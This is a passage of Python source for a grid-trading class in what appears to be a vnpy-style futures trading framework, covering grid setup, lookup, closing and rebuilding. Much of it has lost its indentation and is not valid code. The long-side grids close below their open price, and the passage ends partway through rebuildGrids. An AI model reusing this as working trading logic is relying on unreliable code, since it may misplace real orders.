    self.gridHeight = height  # minimum grid spacing
    self.gridWin = win  # minimum take-profit distance
    self.volume = vol  # volume opened per grid fill
    self.volumeList = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]  # per-level volume multipliers
    self.upGrids = []  # upper grid list (legacy: the long side)
    self.dnGrids = []  # lower grid list (legacy: the short side)
    self.avg_up_open_price = EMPTY_FLOAT  # average open price of upper grids
    self.avg_dn_open_price = EMPTY_FLOAT  # average open price of lower grids
    self.max_up_open_price = EMPTY_FLOAT  # highest open price among upper grids
    self.min_dn_open_price = EMPTY_FLOAT  # lowest open price among lower grids
    self.up_json_file_path = None  # path of the upper-grid json file
    self.dn_json_file_path = None  # path of the lower-grid json file
    self.fixedGrids = False  # Set grids with fixed price or not
    self.fixedGridInitPrice = EMPTY_FLOAT  # anchor price of the fixed grid lattice
    self.gridBufferLength = 5  # Close grids only when (# of grids >= this value)
def enableFixedGrids(self, price, gridbufferlen=5):
    """Turn on fixed-price grid anchoring.

    price: anchor price the fixed grid lattice is aligned to.
    gridbufferlen: grid-count threshold stored in gridBufferLength.
    """
    self.fixedGridInitPrice = price
    self.gridBufferLength = gridbufferlen
    self.fixedGrids = True
def disableFixedGrids(self, price):
    """Turn off fixed-price grid anchoring and reset the anchor to 0.

    The *price* argument is accepted for signature compatibility but is
    not used by the body.
    """
    self.fixedGridInitPrice = 0
    self.fixedGrids = False
def changeGridHeight(self, grid_height=EMPTY_FLOAT, grid_win=EMPTY_FLOAT):
    """Replace the grid spacing and the take-profit distance in one call."""
    self.gridWin = grid_win
    self.gridHeight = grid_height
def getVolumeRate(self, gridIndex=EMPTY_INT):
    """Return the volume multiplier for the grid at *gridIndex*.

    Out-of-range indexes and zero entries both fall back to 1.
    """
    if 0 <= gridIndex < len(self.volumeList):
        rate = self.volumeList[gridIndex]
        return rate if rate != 0 else 1
    return 1
def initGrid(self, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, max_lots=EMPTY_INT, reuse=False):
    """Initialise both grid queues (breakout-style opening).

    upline: upper resistance line; in this legacy class the LONG grids
        anchor here (upGrids).
    dnline: lower support line; the SHORT grids anchor here (dnGrids).
    max_lots: overrides self.maxLots when > 0.
    reuse: propagated to each created CtaGrid.
    """
    if max_lots > EMPTY_INT:
        lots = max_lots
    else:
        lots = self.maxLots
    newupline = upline
    newdnline = dnline
    if self.fixedGrids is True:
        # snap both lines onto the fixed lattice anchored at fixedGridInitPrice
        if abs(self.fixedGridInitPrice - upline) % self.gridHeight > 0:
            newupline = upline - abs(self.fixedGridInitPrice - upline) % self.gridHeight + self.gridHeight # >= current value
            newdnline = dnline - abs(self.fixedGridInitPrice - dnline) % self.gridHeight # <= current value
        self.writeCtaLog(u'初始化网格队列,upline:{}({}),dnline:{}({}), '.format(upline, newupline, dnline, newdnline))
        upline = newupline
        dnline = newdnline
    # initialise the upper (long-side) grid list
    if len(self.upGrids) == 0:
        self.upGrids = self.load(direction= DIRECTION_LONG)
        if len(self.upGrids) > 0:
            self.writeCtaLog(u'上网格从文件{}加载完成'.format(self.up_json_file_path))
        else:
            # long grids: open at upline + height*i, close at open - gridWin
            # NOTE(review): the original comment claimed close = open + win,
            # but the code subtracts gridWin — the code is taken as truth here
            for i in range(0, lots, 1):
                grid = CtaGrid(direction=DIRECTION_LONG,
                               openprice=upline + self.gridHeight*i,
                               closeprice=upline + self.gridHeight*i - self.gridWin,
                               volume=self.volume*self.getVolumeRate(i))
                if reuse:
                    grid.reuse = reuse
                self.upGrids.append(grid)
            self.writeCtaLog(u'上网格{0}~{1}初始化完成'.format(upline,upline+self.gridHeight*self.maxLots))
            self.save(direction=DIRECTION_LONG)
    # initialise the lower (short-side) grid list
    if len(self.dnGrids) == 0:
        self.dnGrids = self.load(direction= DIRECTION_SHORT)
        if len(self.dnGrids) > 0:
            self.writeCtaLog(u'下网格从文件{}加载完成'.format(self.dn_json_file_path))
        else:
            for i in range(0, lots, 1):
                # short grids: open at dnline - height*i, close at open + gridWin
                grid = CtaGrid(direction=DIRECTION_SHORT,
                               openprice=dnline - self.gridHeight * i,
                               closeprice=dnline - self.gridHeight * i + self.gridWin,
                               volume=self.volume*self.getVolumeRate(i))
                if reuse:
                    grid.reuse = reuse
                self.dnGrids.append(grid)
            self.writeCtaLog(u'下网格{0}~{1}初始化完成'.format(dnline,dnline-self.gridHeight*self.maxLots))
            self.save(direction=DIRECTION_SHORT)
def writeCtaLog(self, log):
    """Forward a log line to the owning strategy's CTA logger."""
    self.strategy.writeCtaLog(log)
def toStr(self,direction):
    """Render one direction's grid queue as a human-readable summary string.

    :param direction: DIRECTION_SHORT renders dnGrids, DIRECTION_LONG upGrids.
    :return: summary string listing pending-close, pending-open and idle
        grids (idle list is capped at 5 entries) plus opened volume per type.

    Fix: in the short-side partially-traded branch the format arguments for
    stopPrice and volume were swapped, so the log showed sp:=volume and
    v:=stopPrice; the argument order now matches the long-side branch.
    """
    pendingCloseList = u''    # grids holding positions awaiting close
    pendingOpenList = u''     # grids with working open orders
    deactiveList = u''        # idle grids waiting to be ordered
    openedVolumeDict = {}     # opened volume totals per grid type
    if direction == DIRECTION_SHORT:
        numDeactivated = 0
        for grid in self.dnGrids:
            t = EMPTY_STRING
            if grid.type == LOCK_GRID:
                t = u'L:'
            elif grid.type == TREND_GRID:
                t = u'T:'
            elif grid.type == PERIOD_GRID:
                t = u'P:'
            else:
                t = grid.type
            # position held, awaiting close
            if grid.openStatus :
                opened_volume = 0
                if grid.tradedVolume == EMPTY_INT:
                    pendingCloseList = pendingCloseList + u'{}[{}->{},sp:{},v:{}];'\
                        .format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
                    opened_volume = grid.volume
                else:
                    # fixed argument order: stopPrice then volume
                    pendingCloseList = pendingCloseList + u'[{}{}->{},sp:{},v:{}/{}];'\
                        .format(t, grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume, grid.tradedVolume)
                    opened_volume = grid.volume - grid.tradedVolume
                if grid.type != EMPTY_STRING:
                    openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
                openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
            # open order working, awaiting fill
            elif not grid.openStatus and grid.orderStatus:
                if grid.tradedVolume == EMPTY_INT:
                    pendingOpenList = pendingOpenList + u'[{}{},v:{}];'.format(t, grid.openPrice, grid.volume)
                else:
                    pendingOpenList = pendingOpenList + u'[{}{},v:{}/{}];'\
                        .format(t, grid.openPrice, grid.volume, grid.tradedVolume)
            # idle, waiting to be ordered (only the first 5 are listed)
            else:
                if numDeactivated < 5:
                    deactiveList = deactiveList + u'[{}{}];'.format(t,grid.openPrice)
                    numDeactivated += 1
                else:
                    break
        return u'Short:空:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList, pendingOpenList, deactiveList)
    if direction == DIRECTION_LONG:
        numDeactivated = 0
        for grid in self.upGrids:
            t = EMPTY_STRING
            if grid.type == LOCK_GRID:
                t = u'L:'
            elif grid.type == TREND_GRID:
                t = u'T:'
            elif grid.type == PERIOD_GRID:
                t = u'P:'
            else:
                t = grid.type
            # position held, awaiting close
            if grid.openStatus:
                opened_volume = 0
                if grid.tradedVolume == EMPTY_INT:
                    pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{},v:{}];'\
                        .format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
                    opened_volume = grid.volume
                else:
                    pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{}, v:{}/{}];'\
                        .format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume, grid.tradedVolume)
                    opened_volume = grid.volume - grid.tradedVolume
                if grid.type != EMPTY_STRING:
                    openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
                openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
            # open order working, awaiting fill
            elif not grid.openStatus and grid.orderStatus:
                if grid.tradedVolume == EMPTY_INT:
                    pendingOpenList = pendingOpenList + u'[{}{},v:{}];'.format(t, grid.openPrice, grid.volume)
                else:
                    pendingOpenList = pendingOpenList + u'[{}{},v:{}/{}];'\
                        .format(t, grid.openPrice, grid.volume, grid.tradedVolume)
            # idle, waiting to be ordered (only the first 5 are listed)
            else:
                if numDeactivated < 5:
                    deactiveList = deactiveList + u'[{}{}];'.format(t, grid.openPrice)
                    numDeactivated += 1
                else:
                    break
        return u'Long:多:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList,pendingOpenList,deactiveList)
def getGridsWithTypes(self, direction, types=[]):
"""获取符合类型的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
type:网格类型列表,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.dnGrids
if x.type in types]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
grids = [x for x in self.upGrids
if x.type in types]
return grids
def getOpenedGridsWithTypes(self, direction, types=[]):
"""获取符合类型的持仓网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
type:网格类型列表,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.dnGrids
if x.openStatus == True and x.type in types]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
grids = [x for x in self.upGrids
if x.openStatus == True and x.type in types]
return grids
def getOpenedGrids(self, direction):
"""获取已开仓的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.dnGrids
if x.openStatus == True]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
grids = [x for x in self.upGrids
if x.openStatus == True]
return grids
def getGrids(self, direction, ordered=False, opened=False, closed=False, begin=EMPTY_FLOAT, end=EMPTY_FLOAT, type=EMPTY_STRING, delta=0):
"""获取未挂单的网格
direction:做多、做空方向: 做空方向时,从dnGrids中获取; 做多方向时,从upGrids中获取
ordered:是否已提交至服务器
opened:是否已开仓
closed:是否已平仓
begin:开始价格,
end:结束价格,
delta:基于begin价格的偏移,处理滑点,得到更好的开仓点位
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
if begin == EMPTY_FLOAT: begin = sys.maxsize
if end == EMPTY_FLOAT: end = 0-sys.maxsize
begin += delta
grids = [x for x in self.dnGrids
if x.orderStatus == ordered
and x.openStatus == opened
and x.closeStatus == closed
and x.openPrice >= begin
and x.openPrice <= end
and x.type == type]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
if begin == EMPTY_FLOAT: begin = 0-sys.maxsize
if end == EMPTY_FLOAT: end = sys.maxsize
begin -= delta
grids = [x for x in self.upGrids
if x.orderStatus == ordered
and x.openStatus == opened
and x.closeStatus == closed
and x.openPrice <= begin
and x.openPrice >= end
and x.type == type]
return grids
def getGridById(self,direction, id):
"""寻找指定id的网格"""
if id == EMPTY_STRING or len(id) <1:
return
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
if x.id == id:
self.writeCtaLog(u'找到下网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
return x
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
if x.id == id:
self.writeCtaLog(u'找到上网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
return x
return None
def getPosition(self,direction, type=EMPTY_STRING):
"""获取特定类型的网格持仓"""
if direction == DIRECTION_SHORT:
long_vol = [x.volume-x.tradedVolume for x in self.dnGrids if x.openStatus and x.type == type]
return sum(long_vol)
if direction == DIRECTION_LONG:
short_vol = [x.volume - x.tradedVolume for x in self.upGrids if x.openStatus and x.type == type]
return sum(short_vol)
def updateOrderRef(self, direction, openPrice, orderRef):
"""更新网格的orderId"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.openPrice == openPrice:
x.orderRef = orderRef
x.orderStatus = True
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.openPrice == openPrice:
x.orderRef = orderRef
x.orderStatus = True
def cancelOrderRef(self,direction, openPrice):
"""网格撤单"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.openPrice == openPrice and x.orderRef != EMPTY_STRING and x.orderStatus==True and x.openStatus==False:
x.orderRef = EMPTY_STRING
x.orderStatus = False
self.writeCtaLog(u'下网格撤单[{0}]'.format(x.openPrice))
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.openPrice == openPrice and x.orderRef != EMPTY_STRING and x.orderStatus==True and x.openStatus==False:
x.orderRef = EMPTY_STRING
x.orderStatus = False
self.writeCtaLog(u'上网格撤单[{0}]'.format(x.openPrice))
def getGridbyOpenPrice(self, direction, openPrice, orderRef = EMPTY_STRING):
"""通过开仓价和委托状态获取网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
# 优先匹配价格
if x.orderRef == orderRef and x.openPrice == openPrice:
return x
if direction == DIRECTION_LONG:
for x in self.upGrids:
# 优先匹配价格
if x.orderRef == orderRef and x.openPrice == openPrice:
return x
self.writeCtaLog(u'异常,getGridbyOpenPrice找不到网格[{0},openprice={1},orderRef={2}]'.format(direction, openPrice, orderRef))
return None
def getGrid(self, direction, openPrice=EMPTY_FLOAT, closePrice=EMPTY_FLOAT, orderRef=EMPTY_STRING, t=EMPTY_STRING):
"""获取网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
# 优先匹配价格
if t == u'OpenPrice' and x.openPrice == openPrice:
return x
elif t == u'ClosePrice' and x.closePrice == closePrice:
return x
elif t == u'OrderRef' and x.orderRef == orderRef:
return x
if direction == DIRECTION_LONG:
for x in self.upGrids:
# 优先匹配价格
if t == u'OpenPrice' and x.openPrice == openPrice:
return x
elif t == u'ClosePrice' and x.closePrice == closePrice:
return x
elif t == u'OrderRef' and x.orderRef == orderRef:
return x
self.writeCtaLog(u'异常,getGrid找不到网格[direction={0},oepnPrice={1},closePrice={2},orderRef={3},t={4}]'.format(direction, openPrice, closePrice, orderRef, t))
return None
    def updateClosePrice(self, direction, closePrice=EMPTY_FLOAT, type=EMPTY_STRING):
        """Reset the close price of all opened grids of *type* on one side.

        While fewer than self.gridBufferLength grids of the type are open,
        every close price is set to EMPTY_FLOAT (presumably 0, i.e. "no close
        target" — confirm the constant's value). Once the opened count reaches
        the buffer length, all of them are overwritten with *closePrice*
        (expected to be the close price of the newest grid).
        """
        # if num(opened grids) < gridBufferLength: set closePrice to EMPTY_FLOAT
        # else: set closePrice to the specified one (the newest grid's close price)
        numChanged = 0
        newPrice = EMPTY_FLOAT
        if direction == DIRECTION_SHORT:
            # First pass: zero out the close target and count the opened grids.
            for x in self.dnGrids:
                if x.type == type and x.openStatus is True:
                    x.closePrice = newPrice
                    numChanged += 1
            # Second pass: enough grids are open -> apply the real close price.
            if numChanged >= self.gridBufferLength:
                newPrice = closePrice
                for x in self.dnGrids:
                    if x.type == type and x.openStatus is True:
                        x.closePrice = newPrice
        if direction == DIRECTION_LONG:
            # Same two-pass scheme for the up grids.
            for x in self.upGrids:
                if x.type == type and x.openStatus is True:
                    x.closePrice = newPrice
                    numChanged += 1
            if numChanged >= self.gridBufferLength:
                newPrice = closePrice
                for x in self.upGrids:
                    if x.type == type and x.openStatus is True:
                        x.closePrice = newPrice
        self.writeCtaLog(u'updateClosePrice() {}: update closePrice to {} for all opened grids({})'.format(direction, newPrice, numChanged))
def getFirstLastGrid(self, direction,type = EMPTY_STRING):
"""获取最前/后一个的网格"""
# 做多网格:,first =开仓价最高一个,last= 最低一个
if direction == DIRECTION_LONG:
short_grids = self.getGridsWithTypes(direction=direction, types=[type])
if short_grids is None or len(short_grids) ==0 :
return None, None
if len(short_grids) == 1:
return short_grids[0],short_grids[0]
# 价格由低至高排列
sortedGrids = sorted(short_grids, key=lambda g:g.openPrice)
return sortedGrids[-1], sortedGrids[0]
# 做空网格: first =最低一个,last= 开仓价最高一个
if direction == DIRECTION_SHORT:
long_grids = self.getGridsWithTypes(direction=direction, types=[type])
if long_grids is None or len(long_grids) ==0:
return None, None
if len(long_grids) == 1:
return long_grids[0], long_grids[0]
sortedGrids = sorted(long_grids, key=lambda g: g.openPrice)
return sortedGrids[0], sortedGrids[-1]
return None,None
def getLastOpenedGrid(self, direction,type = EMPTY_STRING,orderby_asc=True):
"""获取最后一个开仓的网格"""
if direction == DIRECTION_LONG:
opened_long_grids = self.getGrids(direction=direction, opened=True,type=type)
if opened_long_grids is None or len(opened_long_grids) ==0 :
return None
if len(opened_long_grids) > 1:
sortedGrids = sorted(opened_long_grids, key=lambda g:g.openPrice)
if orderby_asc:
# 取价格最高的一格
opened_long_grids = sortedGrids[-1:]
else:
# 取价格最低的一格
opened_long_grids = sortedGrids[0:1]
return opened_long_grids[0]
if direction == DIRECTION_SHORT:
opened_short_grids = self.getGrids(direction=direction, opened=True,type=type)
if opened_short_grids is None or len(opened_short_grids) ==0:
return None
if len(opened_short_grids) > 1:
sortedGrids = sorted(opened_short_grids, key=lambda g: g.openPrice)
if orderby_asc:
# 取价格最低的一格
opened_short_grids = sortedGrids[0:1]
else:
# 取价格最高的一格
opened_short_grids = sortedGrids[-1:]
return opened_short_grids[0]
def closeGrid(self, direction, closePrice, closeVolume):
"""网格交易结束"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
self.writeCtaLog(u'下网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
self.dnGrids.remove(x)
return
if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
self.writeCtaLog(u'下网格交易部分结束[{0}->{1}],减少仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume))
x.volume = x.volume - closeVolume
if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
self.writeCtaLog(u'下网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice, closeVolume-x.volume))
closeVolume = closeVolume - x.volume
self.dnGrids.remove(x)
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
self.upGrids.remove(x)
return
if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位减少:{2}'.format(x.openPrice, x.closePrice,closeVolume))
x.volume = x.volume - closeVolume
if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume-x.volume))
closeVolume = closeVolume - x.volume
self.upGrids.remove(x)
def removeGridById(self,direction, id):
"""移除指定id的网格"""
if id == EMPTY_STRING or len(id) <1:
return
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
if x.id == id:
self.writeCtaLog(u'清除下网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
self.dnGrids.remove(x)
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
if x.id == id:
self.writeCtaLog(u'清除上网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
self.upGrids.remove(x)
def removeGrids(self, direction, priceline, type=EMPTY_STRING):
"""清除价格线以下的网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
if x.openPrice < priceline and not x.orderStatus and not x.openStatus and not x.closeStatus and x.type==type:
self.writeCtaLog(u'清除下网格[open={0}]'.format(x.openPrice))
self.dnGrids.remove(x)
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
if x.openPrice > priceline and not x.orderStatus and not x.openStatus and not x.closeStatus and x.type==type:
self.writeCtaLog(u'清除上网格[open={0}]'.format(x.openPrice))
self.upGrids.remove(x)
def moveGrids(self, direction, pricedelta, type=EMPTY_STRING):
"""按pricedelta平移所有网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
x.openPrice += pricedelta # 开仓价格
if x.closePrice != 0:
x.closePrice += pricedelta # 平仓价格
x.stopPrice += pricedelta # 止损价格
x.type = type # 网格类型标签
# self.openPrices = {} # 套利使用,开仓价格,symbol:price
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
x.openPrice += pricedelta # 开仓价格
if x.closePrice != 0:
x.closePrice += pricedelta # 平仓价格
x.stopPrice += pricedelta # 止损价格
x.type = type # 网格类型标签
# self.openPrices = {} # 套利使用,开仓价格,symbol:price
def rebuildGrids(self, direction, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, midline=EMPTY_FLOAT, upRate=1, dnRate=1, reuse=False, useVariableSteps=False):
"""重新拉网
清除未挂单的网格,
在上轨/下轨位置重新挂单
upRate , 上轨网格高度比率
dnRate, 下轨网格高度比率
"""
result = True
newupline = upline
newdnline = dnline
if self.fixedGrids is True:
if abs(self.fixedGridInitPrice - upline) % self.gridHeight > 0:
newupline = upline - abs(self.fixedGridInitPrice - upline) % self.gridHeight + 2*self.gridHeight # ceil(current value, gridHeight) + gridHeight
newdnline = dnline - abs(self.fixedGridInitPrice - dnline) % self.gridHeight - self.gridHeight # floor(current value, gridHeight) - gridHeight
else:
newupline = upline + self.gridHeight
newdnline = dnline - self.gridHeight
if direction == DIRECTION_SHORT:
self.writeCtaLog(u'DEBUG- rebuildGrids Short, 重新拉网:direction:{},upline:{}({}),dnline:{}({})'.format(direction, upline, newupline, dnline, newdnline))
else:
self.writeCtaLog(u'DEBUG- rebuildGrids Long, 重新拉网:direction:{},upline:{}({}),dnline:{}({})'.format(direction, upline, newupline, dnline, newdnline))
uplineDelta = newupline - upline
dnlineDelta = newdnline - dnline
upline = newupline
dnline = newdnline
# 检查上下网格的高度比率,不能低于0.5
if upRate < 0.5 or dnRate < 0.5:
upRate = max(0.5, upRate)
dnRate = max(0.5, dnRate)
# 计算每个网格的高度。如果使用变高的网格,则每过5格把网格搞的增加(self.gridHeight/2)
gridSteps = [0]*self.maxLots
for i in range(1, self.maxLots, 1):
if useVariableSteps == False:
gridSteps[i] = self.gridHeight * i
else:
j = int(i / 5)
gridSteps[i] = gridSteps[i-1] + self.gridHeight + self.gridHeight / 2 * j
# 重建下网格(向下移动开仓的网格)
if direction == DIRECTION_SHORT:
min_long_price = midline
remove_grids = []
opened_grids = []
temp_dnGrids = []
if self.fixedGrids is True:
# 如果价格没变,不需要重新布网格
if dnline == self.dnGrids[0].openPrice:
self.writeCtaLog(u'DEBUG- rebuildGrids Short, dnline not changed, no need to rebuild.')
result = False
return result
# 重建的网格数量(所有网格)
remainLots = 0
lots = self.maxLots - remainLots
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, dnline))
if lots > 0:
for i in range(0, lots, 1):
# 做空,开仓价为下阻力线-网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
open_price = int((dnline - gridSteps[i+remainLots] * dnRate) / self.minDiff ) * self.minDiff
close_price = int((open_price + self.gridWin * dnRate)/self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
temp_dnGrids.append(grid)
self.writeCtaLog(u'重新拉下网格:[{0}~{1}]'.format(dnline, dnline - gridSteps[-1] * dnRate))
# 移除旧的下网格,保留开仓的网格状态
for m in range(0, len(self.dnGrids)):
x = self.dnGrids[m]
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
temp_dnGrids[m].orderStatus = x.orderStatus
temp_dnGrids[m].orderStatus = x.orderStatus
temp_dnGrids[m].volume = x.volume
temp_dnGrids[m].tradedVolume = x.tradedVolume
temp_dnGrids[m].orderStatus = x.orderStatus
temp_dnGrids[m].orderRef = x.orderRef
temp_dnGrids[m].openStatus = x.openStatus
temp_dnGrids[m].closeStatus = x.closeStatus
temp_dnGrids[m].openDatetime = x.openDatetime
temp_dnGrids[m].orderDatetime = x.orderDatetime
temp_dnGrids[m].lockGrids = x.lockGrids
temp_dnGrids[m].reuse = x.reuse
temp_dnGrids[m].type = x.type
temp_dnGrids[m].openPrices = x.openPrices
temp_dnGrids[m].snapshot = x.snapshot
if x.closePrice > 0:
temp_dnGrids[m].closePrice = x.closePrice + dnlineDelta
else:
temp_dnGrids[m].closePrice = 0
if len(remove_grids) > 0:
self.writeCtaLog(u'清除下网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留下网格[{}]'.format(opened_grids))
for x in self.dnGrids[:]:
self.dnGrids.remove(x)
# self.dnGrids.clear()
self.dnGrids = temp_dnGrids
self.writeCtaLog(u'DEBUG- rebuildGrids Short: lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, dnline, dnline - gridSteps[-1] * dnRate))
else:
# 移除未挂单的下网格
for x in self.dnGrids[:]:
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
self.dnGrids.remove(x)
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
if x.openPrice < min_long_price:
min_long_price = x.openPrice
if len(remove_grids) > 0:
self.writeCtaLog(u'清除下网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留下网格[{}]'.format(opened_grids))
# 需要重建的剩余网格数量
remainLots = len(self.dnGrids)
lots = self.maxLots - remainLots
remainLots = 0 # WJ: correction for the rebuild price
dnline = min(dnline, min_long_price-self.gridHeight*dnRate)
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, dnline))
if lots > 0:
for i in range(0, lots, 1):
# 做空,开仓价为下阻力线-网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
open_price = int((dnline - gridSteps[i+remainLots] * dnRate) / self.minDiff ) * self.minDiff
close_price = int((open_price + self.gridWin * dnRate)/self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
self.dnGrids.append(grid)
self.writeCtaLog(u'重新拉下网格:[{0}~{1}]'.format(dnline, dnline - gridSteps[-1] * dnRate))
self.writeCtaLog(u'DEBUG- rebuildGrids Short, lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, dnline, dnline - gridSteps[-1] * dnRate))
# 重建上网格(向上移动开仓的网格)
if direction == DIRECTION_LONG:
max_short_price = midline # 最高开空价
remove_grids = [] # 移除的网格列表
opened_grids = [] # 已开仓的网格列表 temp_dnGrids = {}
temp_upGrids = []
if self.fixedGrids is True:
# 如果价格没变,不需要重新布网格
if upline == self.upGrids[0].openPrice:
self.writeCtaLog(u'DEBUG- rebuildGrids Long, upline not changed, no need to rebuild.')
result = False
return result
# 重建的网格数量(所有网格)
remainLots = 0
lots = self.maxLots - remainLots
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, upline))
if lots > 0:
# 做多,开仓价为上阻力线+网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
open_price = int((upline + gridSteps[i+remainLots] * upRate) / self.minDiff) * self.minDiff
close_price = int((open_price - self.gridWin * upRate) / self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
temp_upGrids.append(grid)
self.writeCtaLog(u'重新拉上网格:[{0}~{1}]'.format(upline, upline + gridSteps[-1] * upRate))
# 移除旧的上网格,保留开仓的网格状态
for m in range(0, len(self.upGrids)):
x = self.upGrids[m]
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
temp_upGrids[m].orderStatus = x.orderStatus
temp_upGrids[m].orderStatus = x.orderStatus
temp_upGrids[m].volume = x.volume
temp_upGrids[m].tradedVolume = x.tradedVolume
temp_upGrids[m].orderStatus = x.orderStatus
temp_upGrids[m].orderRef = x.orderRef
temp_upGrids[m].openStatus = x.openStatus
temp_upGrids[m].closeStatus = x.closeStatus
temp_upGrids[m].openDatetime = x.openDatetime
temp_upGrids[m].orderDatetime = x.orderDatetime
temp_upGrids[m].lockGrids = x.lockGrids
temp_upGrids[m].reuse = x.reuse
temp_upGrids[m].type = x.type
temp_upGrids[m].openPrices = x.openPrices
temp_upGrids[m].snapshot = x.snapshot
if x.closePrice > 0:
temp_upGrids[m].closePrice = x.closePrice + uplineDelta
else:
temp_upGrids[m].closePrice = 0
if len(remove_grids) > 0:
self.writeCtaLog(u'清除上网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留上网格[{}]'.format(opened_grids))
for x in self.upGrids[:]:
self.upGrids.remove(x)
# self.upGrids.clear()
self.upGrids = temp_upGrids
